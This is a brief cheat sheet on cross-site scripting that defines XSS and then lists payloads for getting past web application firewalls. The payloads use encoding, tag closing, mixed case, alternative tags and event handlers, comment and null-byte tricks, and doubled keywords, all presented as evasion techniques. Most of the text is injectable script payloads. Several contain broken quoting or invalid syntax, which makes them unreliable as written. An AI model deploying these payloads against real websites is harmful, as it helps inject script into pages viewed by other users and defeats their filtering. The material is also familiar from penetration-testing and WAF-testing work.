Cross site scripting (XSS) :Some techniques to bypass WAF
Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.
How to bypass WAF:
- Encoding bypass
Hex encode: <0x736372697074>alert(‘123’)</0x736372697074>
jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4- - magic_quotes_gpc bypass: <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>
- close tag:
“><script>alert(/123/)</script>
</script><script>alert(1)</script> - Case insensitive: <ScRIpT>alert(‘123’)</sCRIpT>
- use other tag: <button onclick=”javascript:alert(‘xss’)>XSS</button”>
<title><img a=”</title><img/src=1 onerror=alert(1)//”>
“onsubmit=javascript:alert(1)%20name=”a - use comment: %0aalert(1);
/**/
%00 - Two-letter bypass:
<img ononerrorerror=”123″>
<script>alalertert(123)</script> - Other events bypass
onload
onclick
onerror
prompt
confirm
onmousemove